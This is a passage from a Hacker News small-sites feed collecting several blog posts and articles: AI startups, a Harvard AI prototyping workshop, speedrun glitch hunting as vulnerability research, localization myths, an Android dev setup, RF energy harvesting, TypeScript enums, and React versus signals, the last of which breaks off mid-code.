[11] Mark-8 User Group Newsletter 1, 1 (archived at Bryan’s Old Computers, https://bytecollector.com/archive/mark_8/My_Mark-8_Info/Newsletters/Micro-8_Newsletter/Micro-8_Vol-1_all_issues.PDF); “The Digital Group,” Bryan’s Old Computers, February 2024, https://bytecollector.com/the_digital_group.htm

[12] Freiberger and Swaine, Fire in the Valley, 37-45.

[13] On the 8080 vs 8008 see “Intel 8080,” Wikipedia, https://en.wikipedia.org/wiki/Intel_8080. On the dominant processors of the late 1970s, see “6502, Z80, 8086, 68000: the four CPUs that dominated the 1980s,”  https://www.iljitsch.com/2022/04-19-6502-z80-8086-68000-the-four-cpus-that-dominated-the-1980s.html.

[14] “interview with Jack Rubin,” Scelbi History Museum, https://www.scelbi.com/history-jack-rubin-interview.

[15] François Gernelle, “La Naissance du Premier Micro-Ordinateur: Le Micral N,” in Philippe Chatelin and Pierre E. Mounier-Kuhn, eds., Deuxième Colloque sur l’Histoire de l’Informatique en France, v. 1 (Paris: Conservatoire National des Arts et Métiers, 1990), 97-101.

]]>
https://technicshistory.com/2025/02/22/from-acs-to-altair-the-rise-of-the-hobby-computer/ hacker-news-small-sites-43233137 Sun, 02 Mar 2025 18:04:16 GMT
<![CDATA[The Era of Solopreneurs Is Here]]> thread link) | @QueensGambit
March 2, 2025 | https://manidoraisamy.com/developer-forever/post/the-era-of-solopreneurs-is-here.anc-52867368-2029-4dc5-a7da-ece853a648b5.html | archive.org

DeepSeek just dropped a bombshell: $200M in annual revenue with a 500%+ profit margin—all while charging 25x less than OpenAI. But DeepSeek didn’t just build another AI model. They wrote their own parallel file system (3FS) to optimize costs—something that would have been unthinkable for a company of their size. This was possible because AI helped write the file system. Now, imagine what will happen in a couple of years—AI will be writing code, optimizing infrastructure, and even debugging itself. An engineer with an AI tool can now outbuild a 100-person engineering team.

Disappearing Pillars


For years, the freemium business model, cloud computing, and AI have been converging. First, the internet killed the need for sales teams (distribution moved online). Then, serverless computing eliminated IT teams (AWS, Firebase, you name it). And now, AI is breaking the last barrier—software development itself. This shift has been happening quietly for 15 years, but AI is the final straw that breaks the camel’s back.

This kind of disruption was previously limited to narrow consumer products like WhatsApp, where a 20-member team built a product that led to a $19 billion exit. But now, the same thing is happening in business applications that require breadth. AI will be able to build complex applications that were previously impossible for small teams. Take our own experience: Neartail competes with Shopify and Square, and it’s built by one person. Formfacade is a CRM that competes with HubSpot—built by one person. A decade ago, this wouldn’t have been possible for us. But today, AI handles onboarding, customer support, and even parts of development itself. So, what does this mean for SaaS? It won’t disappear, but it’s about to get a whole lot leaner.

Double Threat to Big Companies

For large incumbents, this shift isn’t just about new competition—it’s a fundamental restructuring of how software businesses operate. They face a double threat:

  1. They must cut down their workforce, even if employees are highly skilled, creating a moral dilemma.
  2. They have to rebuild their products from scratch for the AI era - a challenge for elephants that can't dance.

Look at payments, for example. Stripe charges 3% per transaction. We’re rolling out 2% fees for both payments and order forms because we use AI to read the seller’s SMS and automate the payment processing. It won’t hurt Stripe now—they make billions off Shopify’s transaction fees alone. But it’s a slow rug pull. First, AI-first companies like us will nibble away at Shopify’s revenue. Then, a few will break through and topple Shopify. And only then will incumbents like Stripe feel the pinch as a second-order effect.

Summary

This is a massive opportunity for startups right now. While the giants are trapped in their own complexity, nimble teams can build and launch AI-native solutions that directly challenge established players. Target a bloated SaaS vertical, rebuild it from the ground up with AI at its core, and position it as the next-generation alternative.

For example, the future of CRM isn’t just software—it’s software + sales team. Startups that don’t want to hire salespeople will eagerly adopt AI-driven CRMs that automate outreach and follow-ups. Meanwhile, large companies will hesitate to fire their sales teams or switch from legacy CRMs due to vendor lock-in. But over time, startups using AI-native CRMs will scale into large companies themselves, forcing the laggards to transition or fall behind.

This is why we say, “The future is here, but not evenly distributed.” The AI-native solutions of today will become the default for the next wave of large enterprises. The opportunity isn’t in building software for existing companies—it’s in building it for the startups that will replace them. For founders starting companies today, this is Day Zero in the truest sense. The AI-native companies being built now are the ones that will define the next decade of SaaS. It’s not just disruption—it’s a complete reset.

]]>
https://manidoraisamy.com/developer-forever/post/the-era-of-solopreneurs-is-here.anc-52867368-2029-4dc5-a7da-ece853a648b5.html hacker-news-small-sites-43232999 Sun, 02 Mar 2025 17:52:48 GMT
<![CDATA[ChatGPT Rickrolls Harvard Business School Student]]> thread link) | @johnys
March 2, 2025 | https://blog.johnys.io/the-tech-is-not-the-moat-what-39-harvard-mbas-taught-me-about-ai-startup-building-and-10x-founders/ | archive.org


I keep being impressed by the new ways I see people using AI and how these ideas have yet to go mainstream.

In November 2024, Professor Jeff Bussgang, Professor Christina Wallace, and I taught a hands-on workshop in the Launching Technology Ventures (LTV) class at Harvard Business School.

The goal was to have students, especially non-technical ones, go from -1 to 0: taking a startup idea, building a lean canvas, and launching a first prototype, all with AI.

What I didn’t expect was how much the students would teach us about the changing nature of technical advantage in startups. As one student put it:

"The tech is not the moat!"

A few of my favorite quotes about the impact of the workshop:

"I really wish I had known about these tools when I started working on my startup a few months ago."
"This exercise convinced me that if you're performing ideation and not using AI tools in the process, you're handicapping yourself unnecessarily. AI dramatically improves the process every single step of the way and is an invaluable tool."
"More than ever I'm convinced that even as someone with technical training I either have to learn these tools or perish."

One student was even rickrolled by ChatGPT!

"In the first iteration of my landing page, ChatGPT added the music video for ‘Never Gonna Give You Up’ by Rick Astley under the heading "See Soar in Action"...something you'd definitely want to watch out for."

(I had to double-check her conversation on that one to verify that for myself!)

You can read the detailed takeaways in Professor Bussgang's article here:

How to Teach Using AI to Enable 10x Founders—even non-technical ones—in the Product Market Fit Journey

You can see the student results here:

HBS AI Showcase - Launching Technology Ventures

Harvard Business School AI Showcase of student projects for Launching Technology Ventures Autumn 2024 class. Taught by Jeff Bussgang, Christina Wallace, Jero Beccar, and John Yang-Sammataro.

And if you want to try it out for yourself, here's the open-source version of the exercise:

Prototyping with AI Workshop - Harvard Business School - Launching Technology Ventures - Fall 2024

Professor Bussgang also goes into more detail about how some of the latest AI implications from our class apply to timeless strategies and tactics for finding product-market fit in his new book The Experimentation Machine: Finding Product-Market Fit in the Age of AI:

The Experimentation Machine: Finding Product-Market Fit in the Age of AI: Bussgang, Jeffrey J: 9781962339087: Amazon.com: Books


We're doing a second iteration of the class workshop in March 2025. AI is moving so quickly. I'm excited to see how tools evolve and how we change the workshop along with them.

If you have questions, comments, or feedback, drop me a line!

]]>
https://blog.johnys.io/the-tech-is-not-the-moat-what-39-harvard-mbas-taught-me-about-ai-startup-building-and-10x-founders/ hacker-news-small-sites-43232942 Sun, 02 Mar 2025 17:46:55 GMT
<![CDATA[Speedrunners are vulnerability researchers, they just don't know it yet]]> thread link) | @chc4
March 2, 2025 | https://zetier.com/speedrunners-are-vulnerability-researchers/ | archive.org


Thousands of video game enthusiasts are developing experience in the cybersecurity industry by accident. They have a fun hobby, poring over the details of their favorite games, and they don't know they could be doing something very similar… by becoming a vulnerability researcher.

That probably requires some backstory, especially from a cybersecurity company's blog!

What's a speedrun?

Basically as soon as video games were released, people have been trying to beat them faster than their friends (or enemies) can. Gamers will do this for practically any game on the planet – but the most popular games, or the ones with the most cultural weight and cultish following, naturally end up with the fiercest competition. Speedrunners will run through their favorite game hundreds or thousands of times in order to get to the top of community-driven leaderboards for the fastest time… which puts incentives on that video game's community to find the absolute fastest way to clear the game, no matter how strange.

"Any percent" speedruns, or "any%" more commonly, are usually one of the most popular categories of speedrun for any given game. In it, all rules are off and no weird behavior is disallowed: intentionally triggering bugs in the game, which the developers never intended for the players to be able to perform, often have the potential to shave double-digit percentages of time off existing routes by cutting out entire swathes of the game from having to be played at all. Why do 1 -> 2 -> 3 if you can do a cool trick and skip from 1 -> 3 directly?

A lot of these glitches revolve around extremely precise movement… but for the most dedicated fans, they'll go even further.

Glitch hunting is reverse engineering

Entire groups will spring up inside a game's speedrunning community dedicated to discovering new glitches, and oftentimes they'll apply engineering to it.

These enthusiasts won't just try weird things in the game over and over (although that definitely helps!) – they'll use tools that are standard in the cybersecurity industry to pull apart how software works internally, such as IDA Pro or Ghidra, to discover exactly what makes their target video game tick. On top of static analysis, they'll leverage dynamic analysis as well: glitch hunters will use dynamic introspection and debugging tools, like the Dolphin Emulator’s memory viewer or Cheat Engine, to get a GDB-like interface for figuring out the program's internal data structures and how information is recorded.

And even further, they'll develop entirely new tooling: I've seen groups like the Paper Mario: The Thousand-Year Door community reverse engineer game file formats and create Ghidra program loaders, and other groups completely re-implement Ghidra-disassembled code in C so they can stick it under a fuzzer in isolation. Some of the speedrun glitch hunters are incredibly technically competent, using the exact same tooling and techniques that people in the cybersecurity industry use for reverse engineering every day.

…And it’s vulnerability research

Not only do these groups do reverse engineering, but they also are doing vulnerability research. Remember, they don't only try to figure out how games work, but they try to break the game in any way possible. These glitches end up looking stunningly similar to how memory corruption exploits work for any other computer program: they'll find buffer overflows, use-after-frees, and incorrect state machine transitions in their target games.

And perhaps most impressively, they'll productize their exploits, unlike a lot of people in the cybersecurity industry. Some vulnerability researchers will develop a proof-of-concept to demonstrate a bug – but never build the technical chops to develop that exploit further, the way an adversary would. They might intellectually know how to weaponize a buffer overflow, or a use-after-free, but speedrunning groups by necessity are actually doing it. Oftentimes, actually using these glitches requires working through extremely restrictive constraints, both for what inputs they have control over and what parts of the program they can influence.

Super Mario World runners will place items in extremely precise locations so that the X,Y coordinates form shellcode they can jump to with a dangling reference. Legend of Zelda: Ocarina of Time players will do heap grooming and write a function pointer using the IEEE-754 floating point number bit representation so the game “wrong warps” directly to the end credit sequence... with nothing more than a game controller and a steady hand.

Screenshot from an in-depth technical explanation of a Super Mario 64 glitch. Watch on YouTube.
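
To make the float trick concrete, here is a minimal Python sketch of the underlying type confusion; the address below is hypothetical, for illustration only, not the actual Ocarina of Time target. The point is that any 32-bit code address also reads as a valid IEEE-754 float, so if a runner can get that float stored where the game later dereferences a pointer, execution goes wherever the bits say.

    import struct

    TARGET = 0x80402CE0  # hypothetical N64 code address, illustration only

    # The same four bytes, read as a 32-bit big-endian float: this is the
    # innocuous-looking value (an angle, a coordinate...) a runner would
    # need to smuggle into memory. Here it is a tiny denormal, about -5.9e-39.
    as_float = struct.unpack(">f", struct.pack(">I", TARGET))[0]
    print(as_float)

    # Reading the float back as an integer recovers the address bit-for-bit.
    bits = struct.unpack(">I", struct.pack(">f", as_float))[0]
    assert bits == TARGET

Nothing is ever "converted" at all: the game simply reads the same memory with two different types, which is exactly the situation a stale reference or use-after-free lets runners set up.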

Some of the game communities will even take it a step further! Tool-assisted speedruns, or "TAS" runs, will perform glitches so precise that they can't reliably be performed by human beings at all. They'll leverage frame-by-frame input recordings in order to hit the right angle on a game controller's stick, every time; they'll hit buttons on the exact video game tick, every time.

And because they have such precise control over their actions in games, they'll likewise be able to consider game glitches with exacting precision. TAS authors are able to leverage inspecting the video game with memory debuggers to craft a use-after-free with the perfect heap spray, or write multiple stages of shellcode payload in their player inventory with button presses.

There's even an entire event at the most popular speedrunning marathon, Awesome Games Done Quick/AGDQ, called "TASbot." During it, a robot does all the inputs via a hard-wired controller to perform a tool-assisted speedrun in real time – so it can do things like get arbitrary code execution and use that to replace the video game with an entirely new one, using nothing but controller inputs.

An industry exists!

The fact these people are so technically competent only throws into stark relief how disconnected some of them are from the larger cybersecurity industry. Speedrun glitch hunters will develop heap use-after-free exploits, with accompanying technical write-ups on the level of Google Project Zero… and in doing so, refer to it as an "item storage" glitch, because they developed the knowledge from first principles without ever reading a Phrack article. They'll re-implement disassembled code from Ghidra in C for automated glitch discovery, but without any exposure to American Fuzzy Lop or the large academic body of work driving fuzzer research.

And, critically for us here at Zetier, they don't know you can get paid to do a job very close to finding video game glitches, and so they don't know to apply to our reverse engineering or vulnerability research job postings. A lot of these video game glitch hunters, even the ones writing novel Ghidra loaders or runtime memory analysis scripts, don't think of what they're doing as anything more than a fun hobby; they might go become a normal software engineer, if that. Some of them will look up "IDA Pro" on LinkedIn and see a million malware analysis job postings. No offense to my malware analysis friends, but malware reverse engineering and vulnerability research are two very different roles!

Vulnerability research in industry, unlike more “normal” malware analysis jobs, is usually in the form of an engineer spending significant time investigating exactly how a program works. Like video game glitch discovery, they don’t just care about what it does, but how it does it – and why the authors implemented it in that way, along with how that behavior may affect other parts of the program. Oftentimes, you end up building up a repertoire of small, innocuous “huh that’s weird”-style bugs that are individually useless… until you find some missing piece. And like game glitches, the most satisfying of discoveries on the job are from realizations that there’s a fundamental gap in thinking by the authors, where you don’t just find one glitch but an entire family of glitches, all from the same root cause.

A glimpse of an arbitrary code execution (ACE) exploit walk-through. See the video.

I personally love reading the technical game glitch write-ups that come out of speedrunning communities. Lots of my coworkers, and other people in the industry, likewise enjoy them. I love glitch write-ups because they remind me of the great parts of my job: extremely deep dives into the internals of how programs work, and working around odd constraints. Exploiting vulnerabilities requires mental gymnastics: chaining seemingly innocuous primitives, like walking around out-of-bounds in Pokemon, in a way that lets the author express their creativity and mastery over a piece of software.

Talking to people in speedrunning communities who love poring over assembly, or figuring out exactly what the implications are of a 1-byte buffer overflow in a textbox, only for them to shrug and explain they're reluctantly working in a non-technical industry, strikes me as a shame. If any of these descriptions speak to you, or bring to mind one of your friends, reach out to hello@zetier.com. We'd love to chat.

Let the interwebs know that vulnerability researchers exist:

Share this on HackerNews

]]>
https://zetier.com/speedrunners-are-vulnerability-researchers/ hacker-news-small-sites-43232880 Sun, 02 Mar 2025 17:40:36 GMT
<![CDATA[Falsehoods programmers believe about languages (localization)]]> thread link) | @zdw
March 2, 2025 | https://www.lexiconista.com/falsehoods-about-languages/ | archive.org

This is what we have to put up with in the software localisation industry.

I can’t believe nobody has done this list yet. I mean, there is one about names, one about time and many others on other topics, but not one about languages yet (except one honorable mention that comes close). So, here’s my attempt to list all the misconceptions and prejudices I’ve come across in the course of my long and illustrious career in software localisation and language technology. Enjoy – and send me your own ones!


  • Sentences in all languages can be templated as easily as in English: {user} is in {location} etc.

  • Words that are short in English are short in other languages too.

  • For any text in any language, its translation into any other language is approximately as long as the original.

  • For every lower-case character, there is exactly one (language-independent) upper-case character, and vice versa. (See the sketch after this list.)

  • The lower-case/upper-case distinction exists in all languages.

  • All languages have words for exactly the same things as English.

  • Every expression in English, however vague and out-of-context, always has exactly one translation in every other language.

  • All languages follow the subject-verb-object word order.

  • When words are to be converted into Title Case, it is always the first character of the word that needs to be capitalized, in all languages.

  • Every language has words for yes and no.

  • In each language, the words for yes and no never change, regardless of which question they are answering.

  • There is always only one correct way to spell anything.

  • Each language is written in exactly one alphabet.

  • All languages (that use the Latin alphabet) have the same alphabetical sorting order.

  • All languages are written from left to right.

  • Even in languages written from right to left, the user interface still “flows” from left to right.

  • Every language puts spaces between words.

  • Segmenting a sentence into words is as easy as splitting on whitespace (and maybe punctuation).

  • Segmenting a text into sentences is as easy as splitting on end-of-sentence punctuation.

  • No language puts spaces before question marks and exclamation marks at the end of a sentence.

  • No language puts spaces after opening quotes and before closing quotes.

  • All languages use the same characters for opening quotes and closing quotes.

  • Numbers, when written out in digits, are formatted and punctuated the same way in all languages.

  • No two languages are so similar that it would ever be difficult to tell them apart.

  • Languages that have similar names are similar.

  • Icons that are based on English puns and wordplay are easily understood by speakers of other languages.

  • Geolocation is an accurate way to predict the user’s language.

  • Country flags are accurate and appropriate symbols for languages.

  • Every country has exactly one “national” language.

  • Every language is the “national” language of exactly one country.
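
To make one of these concrete: case mapping is neither one-to-one nor language-independent. A minimal TypeScript sketch, runnable in any modern JS runtime with full Unicode/ICU support:

// German ß has no single-character upper-case form: full case mapping
// expands it to "SS", so upper-casing then lower-casing is lossy.
console.log("ß".toUpperCase());           // "SS"
console.log("SS".toLowerCase());          // "ss", not "ß"

// Turkish dots its capital I: locale-aware upper-casing of "i"
// yields "İ" rather than "I".
console.log("i".toLocaleUpperCase("tr")); // "İ"
console.log("i".toUpperCase());           // "I"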

]]>
https://www.lexiconista.com/falsehoods-about-languages/ hacker-news-small-sites-43232841 Sun, 02 Mar 2025 17:36:20 GMT
<![CDATA[Daily-driving Android as a dev environment]]> thread link) | @tosh
March 2, 2025 | https://mm-dev.rocks/posts/android-as-a-dev-environment/intro/ | archive.org

I get a lot of my development work done on Android devices. That usually means a large tablet, but it’s not impossible to get work done on smaller tablets or even phones (although the smaller you go, the harder it is to maintain ergonomics and practicality).

With Termux/PRoot Distro/Termux:X11 (explained below) I can run all of my most-used Linux apps just as if I were sitting at a desktop, silently (i.e., no fans) and efficiently.

Performance on my S8 Ultra tablet is great — not as fast as the latest most powerful laptops but perfectly comfortable for my usage patterns.

A shortcut to a simple Termux script means I can tap an icon on my Android home screen and boot into the beautiful emptiness of an Ubuntu DWM session in about 5 seconds.

]]>
https://mm-dev.rocks/posts/android-as-a-dev-environment/intro/ hacker-news-small-sites-43232788 Sun, 02 Mar 2025 17:31:34 GMT
<![CDATA[New battery-free technology can power devices using ambient RF signals]]> thread link) | @ohjeez
March 2, 2025 | https://news.nus.edu.sg/nus-researchers-develop-new-battery-free-technology/ | archive.org

In a breakthrough for green energy, researchers demonstrated a novel technique to efficiently convert ambient radiofrequency signals into DC voltage that can power electronic devices and sensors, enabling battery-free operation.

Ubiquitous wireless technologies like Wi-Fi, Bluetooth, and 5G rely on radio frequency (RF) signals to send and receive data. A new prototype of an energy harvesting module – developed by a team led by scientists from the National University of Singapore (NUS) – can now convert ambient or ‘waste’ RF signals into direct current (DC) voltage. This can be used to power small electronic devices without the use of batteries.

RF energy harvesting technologies such as this are essential: they reduce battery dependency, extend device lifetimes, minimise environmental impact, and enhance the feasibility of wireless sensor networks and IoT devices in remote areas where frequent battery replacement is impractical.

However, RF energy harvesting technologies face challenges due to low ambient RF signal power (typically less than -20 dBm), where current rectifier technology either fails to operate or exhibits a low RF-to-DC conversion efficiency. While improving antenna efficiency and impedance matching can enhance performance, this also increases on-chip size, presenting obstacles to integration and miniaturisation.
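
For a sense of scale, dBm is a logarithmic power unit referenced to one milliwatt; the standard conversion (not specific to this paper) is:

P_{\text{mW}} = 10^{P_{\text{dBm}}/10}, \qquad -20\ \text{dBm} = 10^{-2}\ \text{mW} = 10\ \mu\text{W}

so the rectifier has to produce usable DC from roughly ten microwatts or less.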

To address these challenges, a team of NUS researchers, working in collaboration with scientists from Tohoku University (TU) in Japan and the University of Messina (UNIME) in Italy, has developed a compact and sensitive rectifier technology that uses nanoscale spin-rectifiers (SRs) to convert ambient wireless radio frequency signals at power levels below -20 dBm into a DC voltage.

The team optimised SR devices and designed two configurations: 1) a single SR-based rectenna operational between -62 dBm and -20 dBm, and 2) an array of 10 SRs in series achieving 7.8% efficiency and zero-bias sensitivity of approximately 34,500 mV/mW. Integrating the SR-array into an energy harvesting module, they successfully powered a commercial temperature sensor at -27 dBm.

“Harvesting ambient RF electromagnetic signals is crucial for advancing energy-efficient electronic devices and sensors. However, existing Energy Harvesting Modules face challenges operating at low ambient power due to limitations in existing rectifier technology,” explained Professor Yang Hyunsoo from the Department of Electrical and Computer Engineering at the NUS College of Design and Engineering, who spearheaded the project.

Prof Yang added, “For example, gigahertz Schottky diode technology has remained saturated for decades due to thermodynamic restrictions at low power, with recent efforts focused only on improving antenna efficiency and impedance-matching networks, at the expense of bigger on-chip footprints. Nanoscale spin-rectifiers, on the other hand, offer a compact technology for sensitive and efficient RF-to-DC conversion.”

Elaborating on the team’s breakthrough technology, Prof Yang said, “We optimised the spin-rectifiers to operate at low RF power levels available in the ambient, and integrated an array of such spin-rectifiers to an energy harvesting module for powering the LED and commercial sensor at RF power less than -20 dBm. Our results demonstrate that SR-technology is easy to integrate and scalable, facilitating the development of large-scale SR-arrays for various low-powered RF and communication applications.”

The experimental research was carried out in collaboration with Professor Shunsuke Fukami and his team from TU, while the simulation was carried out by Professor Giovanni Finocchio from UNIME. The results were published in the prestigious journal, Nature Electronics, on 24 July 2024.

Spin-rectifier-based technology for the low-power operation

State-of-the-art rectifiers (Schottky diodes, tunnel diodes and two-dimensional MoS2) have reached efficiencies of 40–70% at Prf ≥ -10 dBm. However, the ambient RF power available from RF sources such as Wi-Fi routers is less than -20 dBm. Developing high-efficiency rectifiers for low-power regimes (Prf < -20 dBm) is difficult due to thermodynamic constraints and high-frequency parasitic effects. Additionally, on-chip rectifiers require an external antenna and impedance-matching circuit, impeding on-chip scaling. Therefore, designing a rectifier for an Energy Harvesting Module (EHM) that is sensitive to ambient RF power with a compact on-chip design remains a significant challenge.

The nanoscale spin-rectifiers can convert the RF signal to a DC voltage using the spin-diode effect. Although SR-based technology has surpassed Schottky diode sensitivity, its efficiency in the low-power regime is still below 1%. To overcome the low-power limitations, the research team studied the intrinsic properties of SRs, including the perpendicular anisotropy, device geometry, and dipolar field from the polarizer layer, as well as the dynamic response, which depends on the zero-field tunnelling magnetoresistance and voltage-controlled magnetic anisotropy (VCMA). Combining these optimised parameters with an external antenna impedance-matched to a single SR, the researchers designed an ultralow-power SR-rectenna.

To improve output and achieve on-chip operation, the SRs were coupled in an array arrangement, with small co-planar waveguides on the SRs employed to couple RF power, resulting in a compact on-chip area and high efficiency. One of the key findings is that the self-parametric effect, driven by the well-known VCMA in magnetic tunnel junction-based spin-rectifiers, significantly contributes to the low-power operation of SR-arrays while also enhancing their bandwidth and rectification voltage. In a comprehensive comparison with Schottky diode technology, both in the same ambient situation and against the prior literature, the research team found that SR technology may be the most compact, efficient, and sensitive rectifier technology.

Commenting on the significance of their results, Dr Raghav Sharma, the first author of the paper, shared, “Despite extensive global research on rectifiers and energy harvesting modules, fundamental constraints in rectifier technology remain unresolved for low ambient RF power operation. Spin-rectifier technology offers a promising alternative, surpassing current Schottky diode efficiency and sensitivity in low-power regime. This advancement benchmarks RF rectifier technologies at low power, paving the way for designing next-generation ambient RF energy harvesters and sensors based on spin-rectifiers.”

Next steps

The NUS research team is now exploring the integration of an on-chip antenna to improve the efficiency and compactness of SR technologies. The team is also developing series-parallel connections to tune impedance in large arrays of SRs, utilising on-chip interconnects to connect individual SRs. This approach aims to enhance the harvesting of RF power, potentially generating a significant rectified voltage of a few volts, thus eliminating the need for a DC-to-DC booster.

The researchers also aim to collaborate with industry and academic partners for the advancement of self-sustained smart systems based on on-chip SR rectifiers. This could pave the way for compact on-chip technologies for wireless charging and signal detection systems.

]]>
https://news.nus.edu.sg/nus-researchers-develop-new-battery-free-technology/ hacker-news-small-sites-43232724 Sun, 02 Mar 2025 17:25:49 GMT
<![CDATA[An ode to TypeScript enums]]> thread link) | @disintegrator
March 2, 2025 | https://blog.disintegrator.dev/posts/ode-to-typescript-enums/ | archive.org

It’s official, folks. TypeScript 5.8 is out, bringing with it the --erasableSyntaxOnly flag and the nail in the coffin for many near-primordial language features like Enums and Namespaces. Node.js v23 joined Deno and Bun in adding support for running TypeScript files without a build step. The one true limitation is that only files containing erasable TypeScript syntax are supported, and Enums and Namespaces (ones holding values) violate that rule because they are transpiled to JavaScript objects. So the TypeScript team made it possible to ban those features with the new compiler flag, making it easy for folks to ensure their TS code is directly runnable.
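
For reference, the flag lands in tsconfig like any other option (a minimal sketch; requires TypeScript 5.8+):

{
  "compilerOptions": {
    "erasableSyntaxOnly": true
  }
}

With it enabled, declaring an enum becomes a compile-time error, since enums emit a runtime object rather than erasable type syntax.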

But the issues with Enums didn’t start here. Over the last few years, prominent TypeScript content creators have been making the case against enums on social media, in blog posts and in short video essays. Let me stop here and say it out loud:

In almost all ways that matter, literal unions provide better ergonomics than enums and you should consider them first.

The problem is that these takes, like the articles I linked to above and many others out there, are not interested in making a case for any of the strengths of enums. While I maintain my position above, I want to spend a minute eulogizing an old friend. Remember, as const assertions, which were necessary to supplant enums, were only introduced in TypeScript 3.4. That’s nearly 6 years of using enums since TypeScript 0.9!

Probably my favorite argument in steelmanning enums is that you can document their members, and the documentation is available anywhere you access them. This includes deprecating them, which can be so useful if you are building APIs that evolve over time.

enum PaymentMethod {
  CreditCard = "credit-card",
  DebitCard = "debit-card",
  Bitcoin = "bitcoin",
  /**
   * Use an electronic check to pay your bills. Please note that this may take
   * up to 3 business days to go through.
   *
   * @deprecated Checks will no longer be accepted after 2025-04-30
   */
  Check = "check",
}

const method = PaymentMethod.Check;

There have been many instances where a union member’s value on its own is not perfectly self-explanatory, or is at least ambiguous when living alongside similar unions in a large codebase. The documentation has to be combined into the TSDoc comment of the union type, which cannot reflect deprecations and is not shown when hovering over a union member.

type PaymentMethod =
  | "credit-card"
  | "debit-card"
  | "bitcoin"
  /**
   * Use an electronic check to pay your bills. Please note that this may
   * take up to 3 business days to go through.
   *
   * @deprecated Checks will no longer be accepted after 2025-04-30
   */
  | "check";

const method: PaymentMethod = "check";

There are ways to get around this limitation, where object literals with a const assertion are used, but the reality is that these literals aren’t typically imported and used by consumers of a library. They tend to be built up by library authors to have an iterable/indexable mapping around when validating unknown values, or to enumerate in a UI, e.g. in error messages or to build a <select> dropdown.
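
For completeness, a minimal sketch of that as const pattern (the names mirror the enum above):

const PaymentMethod = {
  CreditCard: "credit-card",
  DebitCard: "debit-card",
  Bitcoin: "bitcoin",
  /** @deprecated Checks will no longer be accepted after 2025-04-30 */
  Check: "check",
} as const;

// Derive the literal union from the object's values.
type PaymentMethod = (typeof PaymentMethod)[keyof typeof PaymentMethod];

// The object doubles as an iterable mapping, e.g. for validation or a <select>:
const allMethods = Object.values(PaymentMethod);

Hovering PaymentMethod.Check does surface the TSDoc, deprecation included, and since the object itself is plain JavaScript with erasable type annotations, it survives --erasableSyntaxOnly.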

There are a couple more quality-of-life features that enums possess, but I’m choosing not to go through them here. For me personally, the degraded inline documentation is by far the toughest pill to swallow in moving to literal unions, and I wanted to focus on that. I’m really hoping the TypeScript team finds a way to support TSDoc on union members as the world moves away from enums.

]]>
https://blog.disintegrator.dev/posts/ode-to-typescript-enums/ hacker-news-small-sites-43232690 Sun, 02 Mar 2025 17:23:12 GMT
<![CDATA[When Declarative Systems Break]]> thread link) | @iamwil
March 2, 2025 | https://interjectedfuture.com/when-declarative-systems-break/ | archive.org

A couple of months ago, I had to reload everything I knew about reactivity back into my head. I discovered that I missed a large corner of the development around unstructured reactivity, by way of Signals. From arguments about signals vs. functional components on Twitter and in post comments, it sounds like the issue concerns developer affordances of different APIs. From the marketing of signal-based frameworks, it sounds like the issue is a matter of performance.

But the reasons why you'd choose signals over functional component-based frameworks like React have more to do with two things: the shape mismatch between the application data and the UI view and whether the performance requirements can tolerate the mismatch.

For most web apps with median performance requirements, functional component-based frameworks like React work really well, especially when your application state closely matches your UI structure. The declarative API makes maintenance and the mental model easier than it would be otherwise.

However, if the gap between the shape of application state and shape of UI views grows, React’s declarative execution model can lead to inefficient updates, hurting performance. Without built-in escape hatches, developers facing these mismatches turn to Signals—trading some of React’s declarative reasoning for more precise and performant state updates.

The Unspoken Assumption

What happens when a piece of application state needs to be rendered by two sibling UI components? React's common advice is to pull that state up to the closest common ancestor and pass that state down as props to the children.
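
In code, the lifted version looks something like this (a minimal sketch; component names are illustrative):

import { useState } from "react";

// `selected` is needed by both siblings, so it lives in their
// closest common ancestor and flows down as props.
function Editor() {
  const [selected, setSelected] = useState<string | null>(null);
  return (
    <>
      <LayerList selected={selected} onSelect={setSelected} />
      <PropertiesPanel selected={selected} />
    </>
  );
}

function LayerList(props: { selected: string | null; onSelect: (id: string) => void }) {
  return <button onClick={() => props.onSelect("rect-1")}>rect-1</button>;
}

function PropertiesPanel(props: { selected: string | null }) {
  return <div>{props.selected ?? "nothing selected"}</div>;
}

Every setSelected call re-renders Editor and both children, which is the cost the rest of this section is about.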

The fundamental assumption of React is that the shape of your state dependency graph is similar to your component tree. If that's the case, then the affordances of React and the granularity of reactivity are in alignment. That might hold for many apps, but when it doesn't, you end up forcing your component hierarchy to revolve around this shared state.

A talk on recoil.js illustrates an instance where app state mismatches the UI view

Imagine a canvas application with sidebars, toolbars, and overlays. An object in this common visual-editing app needs to be represented in both left and right sidebars and the middle canvas. The object is rendered visually on the canvas, as a part of an object hierarchy on the left sidebar, and with its properties on the right sidebar. Each region of the UI might need to observe and mutate the same piece of data, but they all live in different parts of the component tree. Following React’s recommendation, you keep lifting state until everything that needs to access it can do so.

Unfortunately, that may mean large swaths of the UI re-render every time the state changes. If your components are mostly functional, that might not be so bad, but if they contain effects (useEffect) or memoization (useMemo), every change can trigger a wave of potential re-computations and callback closures. It's error-prone and easy to lose track of dependencies.

React also opts for correctness over performance by default, so it'll default to re-rendering. That makes sense as a design goal, if one considers how confusing it is when an incremental system updates halfway, and functions are considered cheap to run. However, it can also be a source of frustration when the app keeps slowing down and you have to keep providing hints to the runtime via dependency lists and various hooks to avoid over-rendering. It can be hard to discern why multiple renders occur without profiling tools. In practice, if the users are performance sensitive, it can feel like you're spending all your time on the submerged mechanics of hinting the declarative runtime instead of touching the viewable components delivering value to users.

Part of the issue is the double-edge of declarative APIs. They're great for reducing complexity in the average case, because the developer only needs to declare the intended goal state. There is nothing else. The system figures out how to find and traverse the path from the current state to the goal state. This frees the developer from keeping track of the previous state in order to compute the next state, and managing state is often the source of bugs.

Unfortunately, every declarative system embeds assumptions about how to traverse the state space during computation from the current state to the goal state. When those assumptions fail, performance suffers because the chosen path from the current state to the goal state is inefficient. Most declarative systems offer no escape hatch or way to influence the execution policy. At least SQL provides EXPLAIN so you can see its plan—many others don’t even offer that. As a result, when performance is critical and these assumptions break, developers often have no choice but to abandon the system entirely and build a new solution from scratch.

Signals is one dominant alternative. It lets you define a separate dependency graph that tracks how state updates should flow, independent of the UI view tree. Whenever a signal changes, only the specific parts of your interface that depend on it need to re-render. This can lead to substantial performance improvements in applications that have complex or cross-cutting state.
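
A toy implementation makes the mechanism concrete (a sketch of the general pattern, not any particular signals library):

type Subscriber = () => void;
let currentEffect: Subscriber | null = null;

function signal<T>(initial: T) {
  let value = initial;
  const subscribers = new Set<Subscriber>();
  return {
    get(): T {
      // Whatever effect is currently running becomes a dependent.
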